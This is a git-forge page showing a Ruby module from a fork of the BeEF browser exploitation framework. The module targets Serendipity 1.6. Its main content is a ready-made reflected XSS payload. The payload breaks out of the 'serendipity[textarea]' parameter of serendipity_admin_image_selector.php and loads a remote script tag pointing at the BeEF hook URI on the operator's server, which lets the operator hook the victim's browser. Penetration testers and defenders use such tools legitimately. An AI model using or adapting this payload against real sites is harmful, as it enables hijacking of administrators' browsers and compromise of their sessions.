Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1f0c5d7ee95fc25b4d769b2fbd230ee467d41b15
beef/modules/exploits/xss/serendipity_1.6_xss/module.rb
jcrew99 486a9bb329 Update copyright 2023 (#2675) 
* updated copyright

* reverted gemfile lock changes
2022-12-31 15:36:07 +10:00

23 lines
867 B
Ruby
Raw Blame History

#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Serendipity_1_6_xss < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http'
hook_file = configuration.get('beef.http.hook_file')
hook_uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}#{hook_file}"
[
{ 'name' => 'uri', 'ui_label' => 'Target URL',
'value' => "http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='\"</script><script src=\"#{hook_uri}\"></script>" }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end
Reference in New Issue View Git Blame Copy Permalink